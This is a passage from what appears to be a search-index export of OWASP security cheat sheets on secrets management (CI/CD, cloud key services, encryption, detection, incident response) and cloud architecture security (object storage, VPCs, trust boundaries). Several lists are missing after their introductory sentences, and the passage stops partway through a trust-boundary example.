Lastly, you should implement emergency (\"break-glass\") processes to restore the service if the system becomes unavailable for reasons other than regular maintenance. Therefore, emergency break-glass credentials should be regularly backed up securely in a secondary secrets management system and tested routinely to verify they work.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#29-policies","title":"2.9 Policies","text":"

Consistently enforce policies defining the minimum complexity requirements of passwords and approved encryption algorithms at an organization-wide level. Using a centralized secrets management solution can help companies implement these policies.

Next, having an organization-wide secrets management policy can help enforce applying the best practices defined in this cheat sheet.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#210-metadata-prepare-to-move-the-secret","title":"2.10 Metadata: prepare to move the secret","text":"

A secret management solution should provide the capability to store at least the following metadata about a secret:

Note: if you don't store metadata about the secret nor prepare to move, you will increase the probability of vendor lock-in.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#3-continuous-integration-ci-and-continuous-deployment-cd","title":"3 Continuous Integration (CI) and Continuous Deployment (CD)","text":"

Building, testing and deploying changes generally requires access to many systems. Continuous Integration (CI) and Continuous Deployment (CD) tools typically store secrets to provide configuration to the application or during deployment. Alternatively, they interact heavily with the secrets management system. Various best practices can help smooth out secret management in CI/CD; we will deal with some of them in this section.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#31-hardening-your-cicd-pipeline","title":"3.1 Hardening your CI/CD pipeline","text":"

CI/CD tooling consumes (high-privilege) credentials regularly. Ensure that the pipeline cannot be easily hacked or misused by employees. Here are a few guidelines which can help you:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#32-where-should-a-secret-be","title":"3.2 Where should a secret be?","text":"

There are various places where you can store a secret to execute CI/CD actions:

Another alternative here is using the CI/CD pipeline to leverage the Encryption as a Service from the secrets management systems to do the encryption of a secret. The CI/CD tooling can then commit the encrypted secret to git, which can be fetched by the consuming service on deployment and decrypted again. See section 3.6 for more details.

Note: not all secrets must be at the CI/CD pipeline to get to the actual deployment. Instead, make sure that the deployed services take care of part of their secrets management at their own lifecycle (E.g. deployment, runtime and destruction).

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#321-as-part-of-your-cicd-tooling","title":"3.2.1 As part of your CI/CD tooling","text":"

When secrets are part of your CI/CD tooling, it means that these secrets are exposed to your CI/CD jobs. CI/CD tooling can comprise, e.g. GitHub secrets, GitLab repository secrets, ENV Vars/Var Groups in Microsoft Azure DevOps, Kubernetes Secrets, etc. These secrets are often configurable/viewable by people who have the authorization to do so (e.g. a maintainer in GitHub, a project owner in GitLab, an admin in Jenkins, etc.), which together lines up for the following best practices:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#322-storing-it-in-a-secrets-management-system","title":"3.2.2 Storing it in a secrets management system","text":"

Naturally, you can store secrets in a designated secrets management solution. For example, you can use a solution offered by your (cloud) infrastructure provider, such as AWS Secrets Manager, Google Secrets Manager, or Azure KeyVault. You can find more information about these in section 4 of this cheat sheet. Another option is a dedicated secrets management system, such as Hashicorp Vault, Keeper, Confidant, Conjur. Here are a few do's and don'ts for the CI/CD interaction with these systems. Make sure that the following is taken care of:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#323-not-touched-by-cicd-at-all","title":"3.2.3 Not touched by CI/CD at all","text":"

Secrets do not necessarily need to be brought to a consumer of the secret by a CI/CD pipeline. It is even better when the consumer of the secret retrieves the secret. In that case, the CI/CD pipeline still needs to instruct the orchestrating system (e.g. Kubernetes) that it needs to schedule a specific service with a given service account with which the consumer can then retrieve the required secret. The CI/CD tooling then still has credentials for the orchestrating platform but no longer has access to the secrets themselves. The do's and don'ts regarding these credentials types are similar to those described in section 3.2.2.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#33-authentication-and-authorization-of-cicd-tooling","title":"3.3 Authentication and Authorization of CI/CD tooling","text":"

CI/CD tooling should have designated service accounts, which can only operate in the scope of the required secrets or orchestration of the consumers of a secret. Additionally, a CI/CD pipeline run should be easily attributable to the one who has defined the job or triggered it to detect who has tried to exfiltrate secrets or manipulate them. When you use certificate-based auth, the caller of the pipeline identity should be part of the certificate. If you use a token to authenticate towards the mentioned systems, make sure you set the principal requesting these actions (e.g. the user or the job creator).

Verify on a periodical basis whether this is (still) the case for your system so that you can do logging, attribution, and security alerting on suspicious actions effectively.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#34-logging-and-accounting","title":"3.4 Logging and Accounting","text":"

Attackers can use CI/CD tooling to extract secrets. They could, for example, use administrative interfaces or job creation which exfiltrates the secret using encryption or double base64 encoding. Therefore, you should log every action in a CI/CD tool. You should define security alerting rules at every non-standard manipulation of the pipeline tool and its administrative interface to monitor secret usage. Logs should be queryable for at least 90 days and stored for a more extended period in cold storage. It might take security teams time to understand how attackers can exfiltrate or manipulate a secret using CI/CD tooling.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#35-rotation-vs-dynamic-creation","title":"3.5 Rotation vs Dynamic Creation","text":"

You can leverage CI/CD tooling to rotate secrets or instruct other components to do the rotation of the secret. For instance, the CI/CD tool can request a secrets management system or another application to rotate the secret. Alternatively, the CI/CD tool or another component could set up a dynamic secret: a secret required for a consumer to use for as long as it lives. The secret is invalidated when the consumer no longer lives. This procedure reduces possible leakage of a secret and allows for easy detection of misuse. If an attacker uses secret from anywhere other than the consumer's IP, you can easily detect it.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#36-pipeline-created-secrets","title":"3.6 Pipeline Created Secrets","text":"

You can use pipeline tooling to generate secrets and either offer them directly to the service deployed by the tooling or provide the secret to a secrets management solution. Alternatively, the secret can be stored encrypted in git so that the secret and its metadata is as close to the developer's daily place of work as possible. A git-stored secret does require that developers cannot decrypt the secrets themselves and that every consumer of a secret has its encrypted variant of the secret. For instance: the secret should then be different per DTAP environment and be encrypted with another key. For each environment, only the designated consumer in that environment should be able to decrypt the specific secret. A secret does not leak cross-environment and can still be easily stored next to the code. Consumers of a secret could now decrypt the secret using a sidecar, as described in section 5.2. Instead of retrieving the secrets, the consumer would leverage the sidecar to decrypt the secret.

When a pipeline creates a secret by itself, ensure that the scripts or binaries involved adhere to best practices for secret generation. Best practices include secure-randomness, proper length of secret creation, etc. and that the secret is created based on well-defined metadata stored somewhere in git or somewhere else.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#4-cloud-providers","title":"4 Cloud Providers","text":"

For cloud providers, there are at least four essential topics to touch upon:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#41-services-to-use","title":"4.1 Services to Use","text":"

It is best to use a designated secret management solution in any environment. Most cloud providers have at least one service that offers secret management. Of course, it's also possible to run a different secret management solution (e.g. HashiCorp Vault or Conjur) on compute resources within the cloud. We'll consider cloud provider service offerings in this section.

Sometimes it's possible to automatically rotate your secret, either via a service provided by your cloud provider or a (custom-built) function. Generally, you should prefer the cloud provider's solution since the barrier of entry and risk of misconfiguration are lower. If you use a custom solution, ensure the function's role to do its rotation can only be assumed by said function.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#411-aws","title":"4.1.1 AWS","text":"

For AWS, the recommended solution is AWS secret manager.

Permissions are granted at the secret level. Check out the Secrets Manager best practices.

It is also possible to use the Systems Manager Parameter store, which is cheaper, but that has a few downsides:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#4111-aws-nitro-enclaves","title":"4.1.1.1 AWS Nitro Enclaves","text":"

With AWS Nitro Enclaves, you can create trusted execution environments. Thus, no human-based access is possible once the application is running. Additionally, enclaves do not have any permanent storage attached to them. Therefore, secrets and other sensitive data stored on the nitro enclaves have an additional layer of security.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#4112-aws-cloudhsm","title":"4.1.1.2 AWS CloudHSM","text":"

For secrets being used in highly confidential applications, it may be needed to have more control over the encryption and storage of these keys. AWS offers CloudHSM, which lets you bring your own key (BYOK) for AWS services. Thus, you will have more control over keys' creation, lifecycle, and durability. CloudHSM allows automatic scaling and backup of your data. The cloud service provider, Amazon, will not have any access to the key material stored in Azure Dedicated HSM.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#412-gcp","title":"4.1.2 GCP","text":"

For GCP, the recommended service is Secret Manager.

Permissions are granted at the secret level.

Check out the Secret Manager best practices.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#4121-google-cloud-confidential-computing","title":"4.1.2.1 Google Cloud Confidential Computing","text":"

GCP Confidential Computing allows encryption of data during runtime. Thus, application code and data are kept secret, encrypted, and cannot be accessed by humans or tools.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#413-azure","title":"4.1.3 Azure","text":"

For Azure, the recommended service is Key Vault.

Contrary to other clouds, permissions are granted at the Key Vault level. This means secrets for separate workloads and separate sensitivity levels should be in separated Key Vaults accordingly.

Check out the Key Vault best practices.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#4131-azure-confidential-computing","title":"4.1.3.1 Azure Confidential Computing","text":"

With Azure Confidential Computing, you can create trusted execution environments. Thus, every application will be executed in an encrypted enclave that protects the data and code consumed by the application is protected end-to-end. Furthermore, any application running inside enclaves is not accessible by any tool or human.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#4132-azure-dedicated-hsm","title":"4.1.3.2 Azure Dedicated HSM","text":"

For secrets being used in Azure environments and requiring special security considerations, Azure offers Azure Dedicated HSM. This allows you more control over the secrets stored on it, including enhanced administrative and cryptographic control. The cloud service provider, Microsoft, will not have any access to the key material stored in Azure Dedicated HSM.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#414-other-clouds-multi-cloud-and-cloud-agnostic","title":"4.1.4 Other clouds, Multi-cloud, and Cloud agnostic","text":"

If you're using multiple cloud providers, you should consider using a cloud agnostic secret management solution. This will allow you to use the same secret management solution across all your cloud providers (and possibly also on-premises). Another advantage is that this avoids vendor lock-in with a specific cloud provider, as the solution can be used on any cloud provider.

There are open source and commercial solutions available. Some examples are:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#42-envelope-client-side-encryption","title":"4.2 Envelope & client-side encryption","text":"

This section will describe how a secret is encrypted and how you can manage the keys for that encryption in the cloud.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#421-client-side-encryption-versus-server-side-encryption","title":"4.2.1 Client-side encryption versus server-side encryption","text":"

Server-side encryption of secrets ensures that the cloud provider takes care of the encryption of the secret in storage. The secret is then safeguarded against compromise while at rest. Encryption at rest often does not require additional work other than selecting the key to encrypt it with (See section 4.2.2). However: when you submit the secret to another service, it will no longer be encrypted. It is decrypted before sharing with the intended service or human user.

Client-side encryption of secrets ensures that the secret remains encrypted until you actively decrypt it. This means it is only decrypted when it arrives at the consumer. You need to have a proper crypto system to cater for this. Think about mechanisms such as PGP using a safe configuration and other more scalable and relatively easy to use systems. Client-side encryption can provide an end-to-end encryption of the secret: from producer till consumer.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#422-bring-your-own-key-versus-cloud-provider-key","title":"4.2.2 Bring Your Own Key versus Cloud Provider Key","text":"

When you encrypt a secret at rest, the question is: which key do you want to use? The less trust you have in the cloud provider, the more you will want to manage yourself.

Often, you can either encrypt a secret with a key managed at the secrets management service or use a key management solution from the cloud provider to encrypt the secret. The key offered through the key management solution of the cloud provider can be either managed by the cloud provider or by yourself. Industry standards call the latter \"bring your own key\" (BYOK). You can either directly import or generate this key at the key management solution or using cloud HSM supported by the cloud provider. You can then either use your key or the customer master key from the provider to encrypt the data key of the secrets management solution. The data key, in turn, encrypts the secret. By managing the CMK, you have control over the data key at the secrets management solution.

While importing your own key material can generally be done with all providers (AWS, Azure, GCP), unless you know what you are doing and your threat model and policy require this, this is not a recommended solution due to its complexity and difficulty of use.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#43-identity-and-access-management-iam","title":"4.3 Identity and Access Management (IAM)","text":"

IAM applies to both on-premise and cloud setups: to effectively manage secrets, you need to set up suitable access policies and roles. Setting this up goes beyond policies regarding secrets; it should include hardening the full IAM setup, as it could otherwise allow for privilege escalation attacks. Ensure you never allow open \"pass role\" privileges or unrestricted IAM creation privileges, as these can use or create credentials that have access to the secrets. Next, make sure you tightly control what can impersonate a service account: are your machines' roles accessible by an attacker exploiting your server? Can service roles from the data-pipeline tooling access the secrets easily? Ensure you include IAM for every cloud component in your threat model (e.g. ask yourself: how can you do elevation of privileges with this component?). See this blog entry for multiple do's and don'ts with examples.

Leverage the temporality of the IAM principals effectively: e.g. ensure that only specific roles and service accounts that require it can access the secrets. Monitor these accounts so that you can tell who or what used them to access the secrets.

Next, make sure that you scope access to your secrets: one should not be simply allowed to access all secrets. In GCP and AWS, you can create fine-grained access policies to ensure that a principal cannot access all secrets at once. In Azure, having access to the key vault means having access to all secrets in that key vault. It is, thus, essential to have separate key vaults when working on Azure to segregate access.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#44-api-limits","title":"4.4 API limits","text":"

Cloud services can generally provide a limited amount of API calls over a given period. You could potentially (D)DoS yourself when you run into these limits. Most of these limits apply per account, project, or subscription, so spread workloads to limit your blast radius accordingly. Additionally, some services may support data key caching, preventing load on the key management service API (see for example AWS data key caching). Some services can leverage built-in data key caching. S3 is one such example.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#5-containers-orchestrators","title":"5 Containers & Orchestrators","text":"

You can enrich containers with secrets in multiple ways: build time (not recommended) and during orchestration/deployment.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#51-injection-of-secrets-file-in-memory","title":"5.1 Injection of Secrets (file, in-memory)","text":"

There are three ways to get secrets to an app inside a docker container.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#52-short-lived-side-car-containers","title":"5.2 Short Lived Side-car Containers","text":"

To inject secrets, you could create short-lived sidecar containers that fetch secrets from some remote endpoint and then store them on a shared volume mounted to the original container. The original container can now use the secrets from mounted volume. The benefit of using this approach is that we don't need to integrate any third-party tool or code to get secrets. Once the sidecar has fetched the secrets, it terminates. Examples of this inclue Vault Agent Sidecar Injector and Conjur Secrets Provider. By mounting secrets to a volume shared with the pod, containers within the pod can consume secrets without being aware of the secrets manager.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#53-internal-vs-external-access","title":"5.3 Internal vs External Access","text":"

You should only expose secrets to communication mechanisms between the container and the deployment representation (e.g. a Kubernetes Pod). Never expose secrets through external access mechanisms shared among deployments or orchestrators (e.g. a shared volume).

When the orchestrator stores secrets (e.g. Kubernetes Secrets), make sure that the storage backend of the orchestrator is encrypted and you manage the keys well. See the Kubernetes Security Cheat Sheet for more information.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#6-implementation-guidance","title":"6 Implementation Guidance","text":"

In this section, we will discuss implementation. Note that it is always best to refer to the official documentation of the secrets management system of choice for the actual implementation as it will be more up to date than any secondary document such as this cheat sheet.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#61-key-material-management-policies","title":"6.1 Key Material Management Policies","text":"

Key material management is discussed in the Key Management Cheat Sheet

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#62-dynamic-vs-static-use-cases","title":"6.2 Dynamic vs Static Use Cases","text":"

We see the following use cases for dynamic secrets, amongst others:

Note that these dynamic secrets often need to be created with the service we need to connect to. To create these types of dynamic secrets, we usually require long term static secrets to create the dynamic secrets themselves. Other static use cases:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#63-ensure-limitations-are-in-place","title":"6.3 Ensure limitations are in place","text":"

Secrets should never be retrievable by everyone and everything. Always make sure that you put guardrails in place:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#64-security-event-monitoring-is-key","title":"6.4 Security Event Monitoring is Key","text":"

Continually monitor who/what, from which IP, and what methodology accesses the secret. There are various patterns where you need to look out for, such as, but not limited to:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#65-usability","title":"6.5 Usability","text":"

Ensure that your secrets management solution is easy to use, as you do not want people to work around it or use it ineffectively due to complexity. This usability requires:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#7-encryption","title":"7 Encryption","text":"

Secrets Management goes hand in hand with encryption. After all, secrets must be stored encrypted somewhere to protect their confidentiality and integrity.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#71-encryption-types-to-use","title":"7.1 Encryption Types to Use","text":"

You can use various encryption types to secure a secret as long as they provide sufficient security, including adequate resistance against quantum computing-based attacks. Given that this is a moving field, it is best to take a look at sources like keylength.com, which enumerate up to date recommendations on the usage of encryption types and key lengths for existing standards, as well as the NSA's Commercial National Security Algorithm Suite 2.0 which enumerates quantum resistant algorithms.

Please note that in all cases, we need to preferably select an algorithm that provides encryption and confidentiality at the same time, such as AES-256 using GCM (Gallois Counter Mode), or a mixture of ChaCha20 and Poly1305 according to the best practices in the field.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#72-convergent-encryption","title":"7.2 Convergent Encryption","text":"

Convergent Encryption ensures that a given plaintext and its key results in the same ciphertext. This can help detect possible re-use of secrets, resulting in the same ciphertext. The challenge with enabling convergent encryption is that it allows attackers to use the system to generate a set of cryptographic strings that might end up in the same secret, allowing the attacker to derive the plain text secret. Given the algorithm and key, you can mitigate this risk if the convergent crypto system you use has sufficient resource challenges during encryption. Another factor that can help reduce the risk is ensuring that a secret is of adequate length, further hampering the possible guess-iteration time required.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#73-where-to-store-the-encryption-keys","title":"7.3 Where to store the Encryption Keys?","text":"

You should not store keys next to the secrets they encrypt, except if those keys are encrypted themselves (see envelope encryption). Start by consulting the Key Management Cheat Sheet on where and how to store the encryption and possible HMAC keys.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#74-encryption-as-a-service-eaas","title":"7.4 Encryption as a Service (EaaS)","text":"

EaaS is a model in which users subscribe to a cloud-based encryption service without having to install encryption on their own systems. Using EaaS, you can get the following benefits:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#8-detection","title":"8 Detection","text":"

There are many approaches to secrets detection and some very useful open source projects to help with this. The Yelp Detect Secrets project is mature and has signature matching for around 20 secrets. For more information on other tools to help you in the detection space, check out the Secrets Detection topic on GitHub.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#81-general-detection-approaches","title":"8.1 General detection approaches","text":"

Shift-left and DevSecOps principles apply to secrets detection as well. These general approaches below aim to consider secrets earlier and evolve the practice over time.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#82-types-of-secrets-to-be-detected","title":"8.2 Types of secrets to be detected","text":"

Many types of secrets exist, and you should consider signatures for each to ensure accurate detection for all. Among the more common types are:

For more fun learning about secrets and practice rooting them out check out the Wrong Secrets project.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#83-detection-lifecycle","title":"8.3 Detection lifecycle","text":"

Secrets are like any other authorization token. They should:

Create detection rules for each of the stages of the secret lifecycle.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#84-documentation-for-how-to-detect-secrets","title":"8.4 Documentation for how to detect secrets","text":"

Create documentation and update it regularly to inform the developer community on procedures and systems available at your organization and what types of secrets management you expect, how to test for secrets, and what to do in event of detected secrets.

Documentation should:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#9-incident-response","title":"9 Incident Response","text":"

Quick response in the event of a secret exposure is perhaps one of the most critical considerations for secrets management.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#91-documentation","title":"9.1 Documentation","text":"

Incident response in the event of secret exposure should ensure that everyone in the chain of custody is aware and understands how to respond. This includes application creators (every member of a development team), information security, and technology leadership.

Documentation must include:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#92-remediation","title":"9.2 Remediation","text":"

The primary goal of incident response is rapid response and containment.

Containment should follow these procedures:

  1. Revocation: Keys that were exposed should undergo immediate revocation. The secret must be able to be de-authorized quickly, and systems must be in place to identify the revocation status.
  2. Rotation: A new secret must be able to be quickly created and implemented, preferably via an automated process to ensure repeatability, low rate of implementation error, and least-privilege (not directly human-readable).
  3. Deletion: Secrets revoked/rotated must be removed from the exposed system immediately, including secrets discovered in code or logs. Secrets in code could have commit history for the exposure squashed to before the introduction of the secret, however, this may introduce other problems as it rewrites git history and will break any other links to a given commit. If you decide to do this be aware of the consequences and plan accordingly. Secrets in logs must have a process for removing the secret while maintaining log integrity.
  4. Logging: Incident response teams must have access to information about the lifecycle of a secret to aid in containment and remediation, including:
"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#93-logging","title":"9.3 Logging","text":"

Additional considerations for logging of secrets usage should include:

Consider using a standardized logging format and vocabulary such as the Logging Vocabulary Cheat Sheet to ensure that all necessary information is logged.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#10-related-cheat-sheets-further-reading","title":"10 Related Cheat Sheets & further reading","text":""},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html","title":"Cloud Architecture Security Cheat Sheet","text":""},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This cheat sheet will discuss common and necessary security patterns to follow when creating and reviewing cloud architectures. Each section will cover a specific security guideline or cloud design decision to consider. This sheet is written for a medium to large scale enterprise system, so additional overhead elements will be discussed, which may be unecessary for smaller organizations.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#risk-analysis-threat-modeling-and-attack-surface-assessments","title":"Risk Analysis, Threat Modeling, and Attack Surface Assessments","text":"

With any application architecture, understanding the risks and threats is extremely important for proper security. No one can spend their entire budget or bandwidth focused on security, so properly allocating security resources is necessary. Therefore, enterprises must perform risk assessments, threat modeling activites, and attack surface assessments to identify the following:

This is all necessary to properly scope the security of an architecture. However, these are subjects that can/should be discussed in greater detail. Use the resources link below to investigate further as part of a healthy secure architecture conversation.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#public-and-private-components","title":"Public and Private Components","text":""},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#secure-object-storage","title":"Secure Object Storage","text":"

Object storage usually has the following options for accessing data:

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#iam-access","title":"IAM Access","text":"

This method involves indirect access on tooling such as a managed or self-managed service running on ephemeral or persistent infrastructure. This infrastructure contains a persistent control plane IAM credential, which interacts with the object storage on the user's behalf. The method is best used when the application has other user interfaces or data systems available, when it is important to hide as much of the storage system as possible, or when the information shouldn't/won't be seen by an end user (metadata). It can be used in combination with web authentication and logging to better track and control access to resources. The key security concern for this approach is relying on developed code or policies which could contain weaknesses.

Pros Cons No direct access to data Potential use of broad IAM policy No user visibility to object storage Credential loss gives access to control plane APIs Identifiable and loggable access Credentials could be hardcoded

This approach is acceptable for sensitive user data, but must follow rigorous coding and cloud best practices, in order to properly secure data.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#signed-urls","title":"Signed URLs","text":"

URL Signing for object storage involves using some method or either statically or dynamically generating URLs, which cryptographically guarantee that an entity can access a resource in storage. This is best used when direct access to specific user files is necessary or preferred, as there is no file transfer overhead. It is advisable to only use this method for user data which is not very sensitive. This method can be secure, but has notable cons. Code injection may still be possible if the method of signed URL generation is custom, dynamic and injectable, and anyone can access the resource anonymously, if given the URL. Developers must also consider if and when the signed URL should expire, adding to the complexity of the approach.

Pros Cons Access to only one resource Anonymous Access Minimal user visibility to object storage Anyone can access with URL Efficient file transfer Possibility of injection with custom code"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#public-object-storage","title":"Public Object Storage","text":"

This is not an advisable method for resource storage and distribution, and should only be used for public, non-sensitive, generic resources. This storage approach will provide threat actors additional reconnaissance into a cloud environment, and any data which is stored in this configuration for any period of time must be considered publicly accessed (leaked to the public).

Pros Cons Efficient access to many resources Anyone can access/No privacy Simple public file share Unauthenticated access to objects Visibility into full file system Accidently leak stored info"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#vpcs-and-subnets","title":"VPCs and Subnets","text":"

Virtual Private Clouds (VPC) and public/private network subnets allow an application and its network to be segmented into distinct chunks, adding layers of security within a cloud system. Unlike other private vs public trade-offs, an application will likely incorporate most or all of these components in a mature architecture. Each is explained below.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#vpcs","title":"VPCs","text":"

VPC's are used to create network boundaries within an application, where-in components can talk to each other, much like a physical network in a data center. The VPC will be made up of some number of subnets, both public and private. VPCs can be used to:

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#public-subnets","title":"Public Subnets","text":"

Public subnets house components which will have an internet facing presence. The subnet will contain network routing elements to allow components within the subnet to connect directly to the internet. Some use cases include:

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#private-subnets","title":"Private Subnets","text":"

Private subnets house components which should not have direct internet access. The subnet will likely contain network routing to connect it to public subnets, to receive internet traffic in a structured and protected way. Private subnets are great for:

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#simple-architecture-example","title":"Simple Architecture Example","text":"

Consider the simple architecture diagram below. A VPC will house all of the components for the application, but elements will be in a specific subnet depending on its role within the system. The normal flow for interacting with this application might look like:

  1. Accessing the application through some sort of internet gateway, API gateway or other internet facing component.
  2. This gateway connects to a load balancer or a web server in a public subnet. Both components provide public facing functions and are secured accordingly.
  3. These components then interact with their appropriate backend counterparts, a database or backend server, contained in a private VPC. This connections are more limited, preventing extraneous access to the possibly \"soft\" backend systems.

Note: This diagram intentionally skips routing and IAM elements for subnet interfacing, for simplicity and to be service provider agnostic.

This architecture prevents less hardened backend components or higher risk services like databases from being exposed to the internet directly. It also provides common, public functionality access to the internet to avoid additional routing overhead. This architecture can be secured more easily by focusing on security at the entry points and separating functionality, putting non-public or sensitive information inside a private subnet where it will be harder to access by external parties.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#trust-boundaries","title":"Trust Boundaries","text":"

Trust boundaries are connections between components within a system where a trust decision has to be made by the components. Another way to phrase it, this boundary is a point where two components with potentially different trust levels meet. These boundaries can range in scale, from the degrees of trust given to users interacting with an application, to trusting or verifying specific claims between code functions or components within a cloud architecture. Generally speaking however, trusting each component to perform its function correctly and securely, suffices. Therefore, trust boundaries likely will occur in the connections between cloud components, and between the application and third party elements, like end users and other vendors.

As an example, consider the architecture below. An API gateway connects to a compute instance (ephemeral or persistent), which then accesses a persistent storage resource. Separately, there exists a server which can verify the authentication, authorization and/or identity of the caller. This is a generic representation of an OAuth, IAM or directory system, which controls access to these resources. Additionally, there exists an Ephemeral IAM server which controls access for the stored resources (using an approach like the IAM Access section above). As shown by the dotted lines, trust boundaries exist between each compute component, the API gateway and the auth/identity server, even though many or all of the elements could be in the same application.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#exploring-different-levels-of-trust","title":"Exploring Different Levels of Trust","text":"

Architects have to select a trust configuration between components, using quantative factors like risk score/tolerance, velocity of project, as well as subjective security goals. Each example below details trust boundary relationships to better explain the implications of trusting a certain resource. The threat level of a specific resource as a color from green (safe) to red (dangerous) will outline which resources shouldn't be trusted.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#1-no-trust-example","title":"1. No trust example","text":"

As shown in the diagram below, this example outlines a model where no component trusts any other component, regardless of criticality or threat level. This type of trust configuration would likely be used for incredibly high risk applications, where either very personal data or important business data is contained, or where the application as a whole has an extremely high business criticality.

Notice that both the API gateway and compute components call out to the auth/identity server. This implies that no data passing between these components, even when right next to each other \"inside\" the application, is considered trusted. The compute instance must then assume an ephemeral identity to access the storage, as the compute instance isn't trusted to a specific resource even if the user is trusted to the instance.

Also note the lack of trust between the auth/identity server and ephemeral IAM server and each component. While not displayed in the diagram, this would have additional impacts, like more rigorous checks before authentication, and possibly more overhead dedicated to cryptographic operations.

This could be a necessary approach for applications found in financial, military or critical infrastructure systems. However, security must be careful when advocating for this model, as it will have significant performance and maintenance drawbacks.

Pros Cons High assurance of data integrity Slow and inefficient Defense in depth Complicated Likely more expensive"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#2-high-trust-example","title":"2. High trust example","text":"

Next, consider the an opposite approach, where everything is trusted. In this instance, the \"dangerous\" user input is trusted and essentially handed directly to a high criticality business component. The auth/identity resource is not used at all. In this instance, there is higher likelihood of a successful attack against the system, because there are no controls in place to prevent it. Additionally, this setup could be considered wasteful, as both the auth/identity and ephemeral IAM servers are not necessarily performing their intended function. (These could be shared corporate resources that aren't being used to their full potential).

This is an unlikely architecture for all but the simplest and lowest risk applications. Do not use this trust boundary configuration unless there is no sensitive content to protect or efficiency is the only metric for success. Trusting user input is never recommended, even in low risk applications.

Pros Cons Efficient Insecure Simple Potentially Wasteful High risk of compromise"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#3-some-trust-example","title":"3. Some trust example","text":"

Most applications will use a trust boundary configuration like this. Using knowledge from a risk and attack surface analysis, security can reasonably assign trust to low risk components or processes, and verify only when necessary. This prevents wasting valuable security resources, but also limits the complexity and efficiency loss due to additional security overhead.

Notice in this example, that the API gateway checks the auth/identity of a user, then immediately passes the request on to the compute instance. The instance doesn't need to re-verify, and performs it's operation. However, as the compute instance is working with untrusted user inputs (designated yellow for some trust), it is still necessary to assume an ephemeral identity to access the storage system.

